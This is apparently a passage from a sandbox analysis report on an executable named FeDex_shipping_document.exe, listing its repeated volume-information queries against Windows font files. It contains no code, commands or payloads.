        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\FeDex_shipping_document.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
